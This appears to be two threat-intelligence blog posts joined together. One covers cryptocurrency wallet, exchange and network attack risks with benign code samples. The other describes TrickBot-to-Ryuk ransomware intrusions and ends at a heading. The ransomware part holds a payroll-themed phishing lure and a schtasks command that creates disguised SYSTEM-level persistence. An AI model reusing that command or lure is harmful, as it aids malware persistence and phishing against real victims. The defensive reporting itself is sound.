By its simplest definition, cryptocurrency is digital money that operates on its own decentralized transaction network. When defined holistically, many argue that cryptocurrencies and their distributed ledger (blockchain) technology are powerful enough to radically change the basic economic pillars of society and fundamentally alter the way our systems of trust, governance, trade, ownership, and business function. However, the technology is new, subject to change, and certain headwinds related to scalability and security still need to be navigated. It is safe to assume that the ecosystem we have today will evolve. Since the final ecosystem is yet to be determined, the associated risk areas will continually shift as the technology develops and grows in user adoption – creating new cyber security paradigms for all network users to consider, whether you are an individual user of cryptocurrency, a miner, a service provider (e.g., exchange, trading platform, or key custodian), a regulator, or a nation-state with vested political interest.

Malicious actors employ a wide variety of tactics to steal cryptocurrencies. These efforts can target users and their wallets, exchanges and/or key custodial services, and underlying networks or protocols supporting cryptocurrencies. FireEye has observed successful attacks that steal from users and cryptocurrency exchanges over the past several years. And while less frequent, attacks targeting cryptocurrency networks and protocols have also been observed. We believe cryptocurrency exchanges and/or key custodial services are, and will continue to be, attractive targets for malicious operations due to the potentially large profits, their often-lax physical and network security, and the lack of regulation and oversight.

This blog post will highlight some of the various risk areas to consider when developing and adopting cryptocurrency and blockchain technology.

Wallet & Key Management

Public and Private Keys

There are two types of keys associated with each wallet: a public key and a private key. Each of these keys provides a different function, and it is the security of the private key that is paramount to securing cryptocurrency funds.

The private key is a randomly generated number used to sign transactions and spend funds within a specific wallet, and the public key (which is derived from the private key) is used to generate a wallet address at which the user can receive funds.


Figure 1: Private key, public key, and address generation flow
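
As a concrete illustration of this flow, the sketch below derives a legacy Bitcoin-style (P2PKH) address from a random private key. It assumes the third-party ecdsa package and a hashlib build that exposes RIPEMD-160; it is illustrative only and should not be used to generate production keys.

import hashlib
import os
import ecdsa  # pip install ecdsa

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def base58check_encode(payload: bytes) -> str:
    # Append a 4-byte double-SHA256 checksum, then encode in Base58
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    data = payload + checksum
    n = int.from_bytes(data, "big")
    encoded = ""
    while n > 0:
        n, rem = divmod(n, 58)
        encoded = B58_ALPHABET[rem] + encoded
    pad = len(data) - len(data.lstrip(b"\x00"))  # leading zero bytes become '1' characters
    return "1" * pad + encoded

# 1. Private key: 32 random bytes
private_key = os.urandom(32)

# 2. Public key: derived from the private key on the secp256k1 curve (uncompressed form)
signing_key = ecdsa.SigningKey.from_string(private_key, curve=ecdsa.SECP256k1)
public_key = b"\x04" + signing_key.get_verifying_key().to_string()

# 3. Address: version byte + RIPEMD160(SHA256(public key)), Base58Check-encoded
pubkey_hash = hashlib.new("ripemd160", hashlib.sha256(public_key).digest()).digest()
address = base58check_encode(b"\x00" + pubkey_hash)  # 0x00 = mainnet P2PKH version byte

print("address:", address)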

The private key must be kept secret at all times and, unfortunately, revealing it to third-parties (or allowing third-parties to manage and store private keys) increases convenience at the expense of security. In fact, some of the most high-profile exchange breaches have occurred in large part due to a lack of operational controls relating to the storage of private keys. Maintaining the confidentiality, integrity, and availability of private keys requires fairly robust controls.

However, from an individual user perspective, a large number of user-controlled software wallet solutions store the private and public keys in a wallet file on the user’s hard drive that is located in a well-known directory, making it an ideal target for actors that aim to steal private keys. Easily available tools such as commercial keyloggers and remote access tools (RATs) can be used to steal funds by stealing (or making copies of) a user’s wallet file. FireEye has observed myriad malware families, traditionally aimed at stealing banking credentials, incorporate the ability to target cryptocurrency wallets and online services. FireEye Intelligence subscribers may be familiar with this already, as we’ve published about these malware families’ use in targeting cryptocurrency assets on our FireEye Intelligence Portal. The following are some of the more prominent crimeware families we have observed incorporating such functionality:

  • Atmos
  • Dridex
  • Gozi/Ursnif
  • Ramnit
  • Terdot
  • Trickbot
  • ZeusPanda/PandaBot
  • IcedID
  • SmokeLoader
  • Neptune EK
  • BlackRuby Ransomware
  • Andromeda/Gamarue
  • ImminentMonitor RAT
  • jRAT
  • Neutrino
  • Corebot

Wallet Solutions

By definition, cryptocurrency wallets are used to store a user’s keys, which can be used to unlock access to the funds residing in the associated blockchain entry (address). Several types of wallets exist, each with their own level of security (pros) and associated risks (cons). Generally, wallets fall into two categories: hot (online) and cold (offline).

Hot Wallets

A wallet stored on a general computing device connected to the internet is often referred to as a “hot” wallet. This type of storage presents the largest attack surface and is, consequently, the riskiest way to store private keys. Types of hot wallets typically include user-controlled and locally stored wallets (also referred to as desktop wallets), mobile wallets, and web wallets. If remote access on any hot wallet device occurs, the risk of theft greatly increases. As stated, many of these solutions store private keys in a well-known and/or unencrypted location, which can make for an attractive target for bad actors. While many of these wallet types offer the user high levels of convenience, security is often the trade-off.

Wallet Type – Examples

Desktop – Bitcoin Core, Atomic, Exodus, Electrum, Jaxx

Mobile – BRD, Infinito, Jaxx, Airbitz, Copay, Freewallet

Web – MyEtherWallet, MetaMask, Coinbase, BTC Wallet, Blockchain.info

Table 1: Types of hot wallets

If considering the use of hot wallet solutions, FireEye recommends some of the following ways to help mitigate risk:

  • Use two-factor authentication when available (as well as fingerprint authentication where applicable).
  • Use strong passwords.
  • Ensure that your private keys are stored encrypted (if possible); a minimal encryption sketch follows this list.
  • Consider using an alternative or secondary device to access funds (like a secondary mobile device or computer not generally used every day) and kept offline when not in use.
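
As a minimal illustration of that encrypted-storage recommendation (a sketch assuming the third-party cryptography package; the file name and iteration count are hypothetical), a wallet file could be protected with a password-derived key as follows:

import base64
import os
from cryptography.fernet import Fernet  # pip install cryptography
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

def encrypt_wallet(wallet_path: str, password: bytes) -> None:
    # Derive a symmetric key from the user's password with a random salt
    salt = os.urandom(16)
    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=600000)
    key = base64.urlsafe_b64encode(kdf.derive(password))

    with open(wallet_path, "rb") as f:
        plaintext = f.read()

    # Store the salt alongside the ciphertext so the key can be re-derived later
    with open(wallet_path + ".enc", "wb") as f:
        f.write(salt + Fernet(key).encrypt(plaintext))

# encrypt_wallet("wallet.dat", b"a strong passphrase")  # hypothetical file name and passphrase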

Cold Wallets

Offline wallets, also called cold wallets, are those that generate and store private keys offline on an air-gapped computer without network interfaces or connections to the outside internet. Cold wallets work by taking the unsigned transactions that occur online, transferring those transactions offline to be verified and signed, and then pushing the transactions back online to be broadcast onto the Bitcoin network. Managing private keys in this way is considered to be more secure against threats such as hackers and malware. These types of offline vaults used for storing private keys are becoming the industry security standard for key custodians such as Coinbase, Bittrex, and other centralized cryptocurrency companies. Recently, Fidelity Investments released a statement regarding its intention to play an integral part in Bitcoin’s custodial infrastructure landscape.

"Fidelity Digital Assets will provide a secure, compliant, and institutional-grade omnibus storage solution for bitcoin, ether and other digital assets. This consists of vaulted cold storage, multi-level physical and cyber controls – security protocols that have been created leveraging Fidelity’s time-tested security principles and best practices combined with internal and external digital asset experts."

-Fidelity Investments                                

While more security-conscious exchanges employ this type of key storage for their users, cold wallets are still susceptible to exploitation:

  • In November 2017, ZDnet published an article describing four methods hackers use to steal data from air-gapped computers through what they call “covert channels.” These channels can be broken down into four groups:
    • Electromagnetic
    • Acoustic
    • Thermal
    • Optical
  • In addition to those four types of attacks, WikiLeaks revealed, as part of its ongoing Vault 7 leak, a tool suite (dubbed Brutal Kangaroo, formerly EZCheese) allegedly used by the CIA for targeting air-gapped networks.
  • In February 2018, security researchers with the Cybersecurity Research Center at Israel's Ben-Gurion University demonstrated proof-of-concept (PoC) malware that allowed for the exfiltration of data from computers placed inside a Faraday cage (an enclosure used to block electromagnetic fields). According to their research, attackers can exfiltrate data from any infected computer, regardless of whether it is air-gapped or inside a Faraday cage. The same group of researchers also revealed additional ways to exploit air-gapped computers:
    • aIR-Jumper attack that steals sensitive information from air-gapped computers with the help of infrared-equipped CCTV cameras that are used for night vision
    • USBee attack that can be used to steal data from air-gapped computers using radio frequency transmissions from USB connectors
    • DiskFiltration attack that can steal data using sound signals emitted from the hard disk drive (HDD) of the targeted air-gapped computer
    • BitWhisper that relies on heat exchange between two computer systems to stealthily siphon passwords or security keys
    • AirHopper that turns a computer's video card into an FM transmitter to capture keystrokes
    • Fansmitter technique that uses noise emitted by a computer fan to transmit data
    • GSMem attack that relies on cellular frequencies
    • PowerHammer, a malware that leverages power lines to exfiltrate data from air-gapped computers.

Hardware Wallets

Hardware wallets are typically a small peripheral device (such as USB drives) used to generate and store keys, as well as verify and sign transactions. The device signs the transactions internally and only transmits the signed transactions to the network when connected to a networked computer. It is this separation of the private keys from the vulnerable online environment that allows a user to transact on the blockchain with reduced risk.

However, hardware wallets are susceptible to exploitation as well, such as man-in-the-middle (MitM) supply chain attacks, wherein a compromised device is purchased. Such an event ostensibly occurred in early 2018, when an individual purchased a compromised Ledger Nano on eBay and consequently lost $34,000 USD worth of cryptocurrency stored on the device, as the attacker had created their own recovery seed to later retrieve the funds stored on the device. In order to trick the victim, the attacker included a fake recovery seed form inside the compromised device packaging (as seen in Figure 2).


Figure 2: Fraudulent recovery seed document for Ledger Nano (image source: Reddit)

To help mitigate the risk of such an attack, FireEye recommends only purchasing a hardware wallet from the manufacturer directly or through authorized resellers.

In addition to supply chain attacks, security researchers with Wallet.fail have recently disclosed two vulnerabilities in the Ledger Nano S device. One of these vulnerabilities allows an attacker to execute arbitrary code from the boot menu, and the other allows physical manipulation to go unnoticed by the user due to a lack of tamper evidence. In both cases, physical access to the device is required, so these attacks are less likely to succeed if proper physical security of the device is maintained and unauthorized third-party purchases are avoided.

Paper Wallets

Typically, wallet software solutions hide the process of generating, using, and storing private keys from the user. However, a paper wallet involves using an open-source wallet generator like BitAddress[.]org and WalletGenerator[.]net to generate the user’s public and private keys. Those keys are then printed to a piece of paper. While many view this form of key management as more secure because the keys do not reside on a digital device, there are still risks.

Because the private key is printed on paper, theft, loss, and physical damage present the highest risk to the user. Paper wallets are one of the only forms of key management that outwardly display the private key in such a way and should be used with extreme caution. It is also known that many printers keep a cache of printed content, so the possibility of extracting printed keys from exploited printers should also be considered.

Exchanges & Key Custodians

According to recent Cambridge University research, in 2013 there were approximately 300,000 to 1.3 million users of cryptocurrency. By 2017 there were between 2.9 million and 5.8 million users. To facilitate this expedited user growth, a multitude of companies have materialized that offer services enabling user interaction with the various cryptocurrency networks. A majority of these businesses function as exchanges and/or key custodians. Consequently, this can make the organization an ideal candidate for intrusion activity, whether it be spear phishing, distributed denial of service (DDoS) attacks, ransomware, or extortion threats (from both internal and external sources).

Many cryptocurrency exchanges and services around the world have reportedly suffered breaches and thefts in recent years that resulted in substantial financial losses and, in many cases, closures (Figure 3). One 2013 study found that out of 40 bitcoin exchanges analyzed, over 22 percent had experienced security breaches, forcing 56 percent of affected exchanges to go out of business.


Figure 3: Timeline of publicly reported cryptocurrency service compromises

Some of the more notable cryptocurrency exchange attacks that have been observed are as follows:

July 2018 – Bancor: Bancor admitted that unidentified actors compromised a wallet that was used to upgrade smart contracts. The actors purportedly withdrew 24,984 ETH tokens ($12.5 million USD) and 229,356,645 NPXS (Pundi X) tokens (approximately $1 million USD). The hackers also stole 3,200,000 of Bancor's own BNT tokens (approximately $10 million USD). Bancor did not comment on the details of the compromise or security measures it planned to introduce.

June 2018 – Bithumb: Attackers stole cryptocurrencies worth $30 million USD from South Korea's largest cryptocurrency exchange, Bithumb. According to Cointelegraph Japan, the attackers hijacked Bithumb's hot (online) wallet.

June 2018 – Coinrail: Coinrail admitted there was a "cyber intrusion" in its system and an estimated 40 billion won ($37.2 million USD) worth of coins were stolen. Police are investigating the breach, but no further details were released.

February 2018 – BitGrail: BitGrail claimed $195 million USD worth of customers' cryptocurrency in Nano (XRB) was stolen.

January 2018 – Coincheck: Unidentified attackers stole 523 million NEM coins (approximately $534 million USD) from the exchange's hot wallet. Coincheck stated that NEM coins were kept on a single-signature hot wallet rather than a more secure multi-signature wallet and confirmed that stolen coins belonged to Coincheck customers.

July 2017 – Coindash: Unidentified actors reportedly stole $7.4 million USD from users attempting to invest during a Coindash (app platform) ICO. Coindash, which offers a trading platform for ether, launched its ICO by posting an Ethereum address to which potential investors could send funds. However, malicious actors compromised the website and replaced the legitimate address with their own ether wallet address. Coindash realized the manipulation and warned users only three minutes after the ICO began, but multiple individuals had already sent funds to the wrong wallet. This incident was the first known compromise of an ICO, which indicates the persistent creativity of malicious actors in targeting cryptocurrencies.

June 2017 – Bithumb: Bithumb, a large exchange for ether and bitcoin, admitted that malicious actors stole a user database from a computer of an employee that allegedly includes the names, email addresses, and phone numbers of more than 31,800 customers. Bithumb stated that its internal network was not compromised. Bithumb suggested that actors behind this compromise used the stolen data to conduct phishing operations against the exchange's users in an attempt to steal currency from its wallets, allegedly stealing cryptocurrency worth more than $1 million USD.

April 2017 – Yapizon: Unidentified actor(s) reportedly compromised four hot wallets belonging to a South Korean Bitcoin exchange, Yapizon, and stole more than 3,816 bitcoins (approximately $5 million USD). The identity of the responsible actor(s) and the method used to access the wallets remain unknown. However, Yapizon stated that there was no insider involvement in this incident.

August 2016 – Bitfinex: Malicious actor(s) stole almost 120,000 bitcoins ($72 million USD at the time) from clients' accounts at Bitfinex, an exchange platform in Hong Kong. How the breach occurred remains unknown, but the exchange made some changes to its systems after regulatory scrutiny. However, some speculate that complying with the regulators' recommendations made Bitfinex vulnerable to theft.

May 2016 – Gatecoin: The Hong Kong-based Gatecoin announced that as much as $2 million USD in ether and bitcoin were lost following an attack that occurred over multiple days. The company claimed that a malicious actor altered its system so ether deposit transfers went directly to the attacker's wallet during the breach.

February 2015 – KipCoin: The Chinese exchange KipCoin announced that an attacker gained access to its server in 2014 and downloaded the wallet.dat file. The malicious actor stole more than 3,000 bitcoins months later.

February 2015 – BTER: BTER announced via its website that it lost 7,170 bitcoins ($1.75 million USD at the time). The company claimed that the bitcoins were stolen from its cold wallet.

January 2015 – Bitstamp: Bitstamp reported that multiple operational wallets were compromised, which resulted in the loss of 19,000 bitcoins. The company received multiple phishing attempts in the months prior to the theft. One employee allegedly downloaded a malicious file that gave the attacker access to servers that contained the wallet.dat file and passphrase for the company's hot wallet.

August 2014 – BTER: The China-based exchange BTER claimed that an attacker stole 50 million NXT ($1.65 million USD at the time). The company claims the theft was possible following an attack on one of its hosting servers. The company reportedly negotiated the return of 85 percent of the stolen funds from the attacker.

July 2014 – MintPal: MintPal admitted that an attacker accessed 8 million VeriCoins ($1.8 million USD) in the company's hot wallet. The attackers exploited a vulnerability in its withdrawal system that allowed them to bypass security controls to withdraw the funds.

Early 2014 – Mt. Gox: Mt. Gox, one of the largest cryptocurrency exchanges, filed for bankruptcy following a theft of 850,000 bitcoins (approximately $450 million USD at the time) and more than $24 million USD from its bank accounts. A bug in the exchange's system that went unidentified for years allegedly enabled this compromise. Additionally, some speculated that an insider could have conducted the theft. Notably, recent reports revolving around the arrest of the founder of BTC-e (Alexander Vinnik) suggest he was responsible for the attack on Mt. Gox.

Table 2: Sample of observed exchange breaches

As little oversight is established for cryptocurrency exchanges and no widely accepted security standards exist for them, such incidents will likely persist. Notably, while these incidents may involve outsiders compromising exchanges' and services' systems, many of the high-profile compromises have also sparked speculations that insiders have been involved.

Software Bugs

While there has yet to be an in-the-wild attack that has caused significant harm to the Bitcoin network itself, remember the Bitcoin software is just that: software. Developers have identified 30 common vulnerabilities and exposures (CVEs) since at least 2010, many of which could have caused denial of service attacks on the network, exposure of user information, degradation of transaction integrity, or theft of funds.

The most recent was a transaction validation bug that affected the consensus rules, essentially allowing miners to create transactions that weren’t properly validated and contained an extra input – which could ultimately have been exploited to create an amount of bitcoin from nothing. This vulnerability went unnoticed for two years and, fortunately, was responsibly disclosed.

Running any peer-to-peer (P2P) or decentralized and distributed software is risky because each individual user has the responsibility to upgrade software when bugs are found. The more people who fail to update their software in a timely manner, the greater the chance of those nodes being exploited or used to attack the network.

Scaling & Attack Surface

At the time of this post, scaling blockchain networks to the size required to support a truly global payment system still presents a problem for the new technology and is an area of contention among developers and industry players. To address this, many developers are working on various scaling solutions. The following are some of the proposed solutions and the risks associated with each:

On-chain Scaling

One proposed suggestion is to increase the block size, which consequently shifts the cost of scaling to miners and those who operate nodes. Some argue that this could introduce the risk of centralization, because only larger organizations able to meet the bandwidth and storage demands of ever-increasing block sizes could support this type of solution.

Off-chain Scaling

Some of the more popular blockchain scaling solutions for crypto-assets often depend on layering networks and system architectures on top of the base protocol – also referred to as “layer two” (L2) scaling. This allows users to conduct transactions “off-chain” and only occasionally synchronize them with the Bitcoin blockchain. Many argue that this is similar to how legal contracts are enforced; you don’t need to go to court each time a legal contract is written, agreed upon, and executed. And this is something that already occurs frequently in Bitcoin, as the vast majority of transactions happen offline and off-chain within large exchanges’ and merchant providers’ cold storage solutions.

However, two choices for off-chain scaling exist:

Off-chain Private Databases

This solution involves pushing transactions off-chain to a privately managed database where transactions can be settled and then occasionally synced with the Bitcoin blockchain. However, in creating this second layer of private “off-chain” transaction processing, an element of trust is introduced to the system, which unfortunately introduces risk. When transactions occur “off-chain” in a centralized private database, there is a risk of improperly secured centralized ledgers that can be falsified or targeted for attack.

Off-chain Trustless Payment Channels

Another L2 solution would be to push transactions off-chain – not onto a private database, but onto a trustless decentralized routing network. There are two primary L2 solutions being developed: the Lightning Network (for Bitcoin) and Raiden (for Ethereum).

However, a critique of this type of scaling solution is that the accounts used on this layer are considered hot wallets, which presents the largest attack surface. This makes it the riskiest way to store funds while also creating a valuable target for hackers. If an attacker is able to identify and access a user’s L2 node and associated wallet, they could transmit all funds out of the user’s wallet.

Lightning and Raiden as scaling solutions are still relatively new and experimental, so it’s unknown whether they will be globally accepted as the preferred industry scaling solution. Additionally, because this layered development is still new and not widely implemented, at the time of this post there has not yet been an instance or proof-of-concept attack against L2 networks.

Network & Protocol Attacks

Actors may also attempt to directly exploit a cryptocurrency P2P network or cryptographic protocol to either steal cryptocurrency or disrupt a cryptocurrency network. Albeit rare, successful attacks of this nature have been observed. Examples of attack vectors that fall into this category include the following:

51% Attack

The 51% attack refers to the concept that if a single malicious actor or cohesive group of miners controlled more than 50 percent of the computing capability validating a cryptocurrency's transactions, they could reverse their own transactions or prevent transactions from being validated. While previously considered theoretical, 51% attacks have been recently observed:

  • In early April 2018, the cryptocurrency Verge reportedly suffered a 51% attack, which resulted in the attacker being able to mine 1,560 Verge coins (XVG) every second for a duration of three hours.
  • In May 2018, developers notified various cryptocurrency exchanges of a 51% attack on Bitcoin Gold. According to a report by Bitcoinist, the attack cost exchanges nearly $18 million.
  • Following the Bitcoin Gold attack, in June 2018, ZenCash became another target of the 51% attack, in which attackers siphoned $550,000 USD worth of currency from exchanges.
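
To see why a simple majority of hash power is so decisive, consider the simplified model from the Bitcoin whitepaper (Section 11), which treats the race between an attacker and the honest chain as a gambler's-ruin problem. The short sketch below is illustrative only; real-world attacks also depend on factors such as network participation, hash rental markets, and exchange confirmation policies.

def attacker_catchup_probability(q: float, z: int) -> float:
    """Probability that an attacker controlling a share q of the hash power
    ever overtakes the honest chain from z blocks behind (Bitcoin whitepaper model)."""
    p = 1.0 - q
    if q >= p:
        return 1.0  # with a majority of hash power, catching up is guaranteed
    return (q / p) ** z

for share in (0.10, 0.30, 0.45, 0.51):
    print(f"q={share:.2f}  P(catch up from 6 blocks behind)={attacker_catchup_probability(share, 6):.6f}")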

Companies such as NiceHash offer a marketplace for cryptocurrency cloud mining in which individuals can rent hashing power. Coupled with the information available from sites like Crypto51, which calculates the cost of performing 51% attacks, this presents an attractive option for criminals seeking to disrupt cryptocurrency networks. While these types of attacks have been observed and are no longer theoretical, they have historically posed the most risk to various alt-coins with lower network participation and hash rates. Larger, more robust proof-of-work (PoW) networks are less likely to be affected, as the cost to perform the attack outweighs the potential profit.

We anticipate that as long as the cost to perform the 51% attack and the likelihood of getting caught remains low, while the potential profit remains high, actors will continue showing interest in these types of attacks across less-robust cryptocurrency networks. 

Sybil Attack

A Sybil attack occurs when a single node claims to be multiple nodes on the P2P network, which many see as one of the greatest security risks among all large-scale, peer-to-peer networks. A notable Sybil attack (in conjunction with a traffic confirmation attack) against the Tor anonymity network occurred in 2014, spanned the course of five months, and was conducted by unknown actors.

As it pertains to cryptocurrency networks in particular, attackers performing this type of attack could perform the following:

  • Block honest users from the network by outnumbering honest nodes and refusing to receive or transmit blocks.
  • In large-scale attacks where the attacker controls a majority of the network computing power, change the order of transactions, prevent them from being confirmed, or even reverse transactions, which can lead to double spending.

As described by Microsoft researcher John Douceur, many P2P networks rely on redundancy to help lower the dependence on potential hostile nodes and reduce the risk of such attacks. However, this method of mitigation falls short if an attacker impersonates a substantial fraction of the network nodes, rendering redundancy efforts moot. The suggested solution to avoiding Sybil attacks in P2P networks, as presented in the research, is to implement a logically centralized authority that can perform node identity/verification. According to the research, without implementing such a solution, Sybil attacks will always remain a threat “except under extreme and unrealistic assumptions of resource parity and coordination among entities.”

Eclipse Attack

An eclipse attack involves an attacker or group controlling a significant number of nodes and then using those nodes to monopolize inbound and outbound connections to other victim nodes, effectively obscuring the victim node’s view of the blockchain and isolating it from other legitimate peers on the network. According to security researchers, aside from disrupting the network and filtering the victim node’s view of the blockchain, eclipse attacks can be useful in launching additional attacks once successfully executed. Some of these attacks include:

  • Engineered Block Races: Block races occur in mining when two miners discover blocks at the same time. Generally, one block will be added to the chain, yielding mining rewards, while the other block is orphaned and ignored, yielding no mining reward. If an attacker can successfully eclipse attack miners, the attacker can engineer block races by hoarding blocks until a competing block has been found by non-eclipsed miners – effectively causing the eclipsed miners to waste efforts on orphaned blocks.
  • Splitting Mining Power: An attacker could use eclipse attacks to effectively cordon off fractions of miners on a network, thereby eliminating their hashing power from the network. Removing hashing power from a network allows for easier 51% attacks to occur given enough miners are effectively segmented from the network to make a 51% attack profitable.

On Jan. 5, 2019, the cryptocurrency company Coinbase detected a possible eclipse + 51% attack affecting the Ethereum Classic (ETC) blockchain. The attack involved malicious nodes surrounding Coinbase nodes, presenting them with several deep chain reorganizations and multiple double spends – totaling 219,500 ETC (worth roughly $1.1 million USD at the time of this reporting).

While eclipse attacks are difficult to mitigate across large-scale P2P networks, some fixes can make them more difficult to accomplish. FireEye recommends implementing the following, where applicable, to help reduce the risk of eclipse attacks:

  • Randomized node selection when establishing connections.
  • Retain information on other nodes previously deemed honest, and implement preferential connections to those nodes prior to randomized connections (this increases the likelihood of connecting to at least one honest node); a minimal sketch of this selection logic follows the list.
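
A minimal sketch of that preferential peer-selection idea is shown below; the function, its parameters, and the inputs in the usage comment are hypothetical and greatly simplified compared to real node implementations.

import random

def choose_peers(candidates, known_good, total=8, preferred=2):
    # Pick a couple of previously vetted peers first, then fill the remaining
    # slots with random selections from the wider candidate pool
    peers = random.sample(list(known_good), min(preferred, len(known_good)))
    remaining = [c for c in candidates if c not in peers]
    peers += random.sample(remaining, min(total - len(peers), len(remaining)))
    return peers

# e.g., choose_peers(discovered_addresses, anchor_peers)  # hypothetical inputs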

How the Public and Private Sector Can Help Mitigate Risk

Public Sector Priorities

As blockchain technology continues to develop, and issues like scaling, security, and identity management are addressed, it is safe to assume the ecosystem we have today will not look like the ecosystem of tomorrow. Due to this, the public sector has generally maintained a hands-off approach to allow the space to mature and innovate before implementing firm regulations. However, in the future, there are likely to be certain key areas of regulation the public sector could focus on:

  • Virtual Currencies (tax implications, asset classification)
  • Data encryption
  • Privacy
  • Identity Management (KYC and FCC)

Private Sector’s Role

Because of the public sector’s wait-and-see approach to regulation, it could be argued that the private sector should have a more active role in securing the technology as it continues to mature. Private sector leaders in software and network development, hardware manufacturing, and cyber security all have the ability to weigh in on blockchain development as it progresses to ensure user security and privacy are top priorities. Universities and independent research groups should continue to study this emerging technology as it develops.

While no widely promoted and formal security standards exist for cryptocurrency networks at the time of this post, The Cryptocurrency Certification Consortium (C4) is actively developing the Cryptocurrency Security Standard (CCSS), a set of requirements and framework to complement existing information security standards as it relates to cryptocurrencies, including exchanges, web applications, and cryptocurrency storage solutions.

Cyber Security Community

From a cyber security perspective, we should learn from the vulnerabilities of TCP/IP development in the early days of the internet, which focused more on usability and scale than on security and privacy, and insist that if blockchain technology is to help revolutionize the way business and trade are conducted, those two areas of focus (security and privacy) are held at the forefront of blockchain innovation and adoption. This can be achieved through certain self-imposed (and universally agreed upon) industry standards, including:

  • Forced encryption of locally stored wallet files (instead of opt-in options).
  • Code or policy rule that requires new wallet and key generation when user performs password changes.
  • Continued development and security hardening of multi-sig wallet solutions.
  • Emphasis on and clear guidelines for responsible bug disclosure.
  • Continued security research and public reporting on security implications of both known and hypothetical vulnerabilities regarding blockchain development.
    • Analyzing protocols and implementations to determine what threats they face, and providing guidance on best practices.

Outlook

While blockchain technology offers the promise of enhanced security, it also presents its own challenges. Greater responsibility for security is often put into the hands of the individual user, and while some of the security challenges facing exchanges and online wallet providers can be addressed through existing best practices in cyber security, linking multiple users, software solutions, and integration into complex legacy financial systems creates several new cyber security paradigms.

To maintain strong network security, the roles and responsibilities of each type of participant in a blockchain network must be clearly defined and enforced, and the cyber security risks posed by each type of participant must be identified and managed. It is also critical that blockchain development teams understand the full range of potential threats that arise from interoperating with third parties and layering protocols and applications atop the base protocols.

The value and popularity of cryptocurrencies have grown significantly in recent years, making these types of currencies a very attractive target for financially motivated actors. Many of the aforementioned attack vectors can be of high utility in financially motivated operations. We expect cyber crime actors will continue to demonstrate high interest in targeting cryptocurrencies and their underlying network protocols for the foreseeable future.

A Nasty Trick: From Credential Theft Malware to Business Disruption

FireEye is tracking a set of financially-motivated activity referred to as TEMP.MixMaster that involves the interactive deployment of Ryuk ransomware following TrickBot malware infections. These operations have been active since at least December 2017, with a notable uptick in the latter half of 2018, and have proven to be highly successful at soliciting large ransom payments from victim organizations. In multiple incidents, rather than relying solely on built-in TrickBot capabilities, TEMP.MixMaster used EMPIRE and RDP connections to enable lateral movement within victim environments. Interactive deployment of ransomware, such as this, allows an attacker to perform valuable reconnaissance within the victim network and identify critical systems to maximize their disruption to business operations, ultimately increasing the likelihood an organization will pay the demanded ransom. These operations have reportedly netted about $3.7 million in current BTC value.

Notably, while there have been numerous reports attributing Ryuk malware to North Korea, FireEye has not found evidence of this during our investigations. This narrative appears to be driven by code similarities between Ryuk and Hermes, a ransomware that has been used by APT38. However, these code similarities are insufficient to conclude North Korea is behind Ryuk attacks, as the Hermes ransomware kit was also advertised for sale in the underground community at one time.

It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware. The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provides the malware to a limited number of cyber criminal actors to use in operations. This is partially evident through its use of “gtags” that appear to be unique campaign identifiers used to identify specific TrickBot users. In recent incidents investigated by our Mandiant incident response teams, there has been consistency across the gtags appearing in the configuration files of TrickBot samples collected from different victim networks where Ryuk was also deployed. The uniformity of the gtags observed across these incidents appears to be due to instances of TrickBot being propagated via the malware’s worming module configured to use these gtag values.

Currently, we do not have definitive evidence that the entirety of TEMP.MixMaster activity, from TrickBot distribution and operation to Ryuk deployment, is being conducted by a common operator or group. It is also plausible that Ryuk malware is available to multiple eCrime actors who are also using TrickBot malware, or that at least one TrickBot user is selling access to environments they have compromised to a third party.  The intrusion operations deploying Ryuk have also been called GRIM SPIDER.

TrickBot Infection Leading to Ryuk Deployment

The following is a summary of tactics observed across incident response investigations in which the use of TrickBot preceded distribution of Ryuk ransomware. Of note, due to the interactive nature of Ryuk deployment, the TTPs leading to its execution can vary across incidents. Furthermore, in at least one case, artifacts related to the execution of TrickBot were collected but there was insufficient evidence to clearly tie observed Ryuk activity to the use of TrickBot.

Initial Infection

The initial infection vector was not confirmed in all incidents; in one case, Mandiant identified that the attackers leveraged a payroll-themed phishing email with an XLS attachment to deliver TrickBot malware (Figure 1). The campaign is documented on this security site. Data from FireEye technologies shows that this campaign was widely distributed primarily to organizations in the United States, and across diverse industries including government, financial services, manufacturing, service providers, and high-tech.

Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server. Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign’s broad distribution both geographically and across industry verticals.

Subject: FW: Payroll schedule
Attachment: Payrollschedule.xls

Pay run summary report and individual payslips.
Kind Regards,
Adam Bush
CONFIDENTIALITY NOTICE:
The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the intended recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.

Figure 1: Email from a phishing campaign that downloaded TrickBot, which eventually led to Ryuk

Persistence and Lateral Movement

When executed, TrickBot created scheduled tasks on compromised systems to execute itself and ensure persistence following system reboot. These instances of TrickBot were configured to use their network propagation modules (sharedll and tabdll) that rely on SMB and harvested credentials to propagate to additional systems in the network. The number of systems to which TrickBot was propagated varied across intrusions from fewer than ten to many hundreds.
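
As an illustration of this persistence pattern (a hypothetical sketch, not the attacker's actual task; the task name and binary path below are placeholders), a reboot-surviving scheduled task of this kind could be created and then verified with the built-in schtasks utility:

schtasks /Create /TN "WinNetValidator" /TR "C:\Users\Public\netvalidator.exe" /SC ONSTART /RU SYSTEM /F
schtasks /Query /TN "WinNetValidator" /V /FO LIST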

Dwell Time and Post-Exploitation Activity

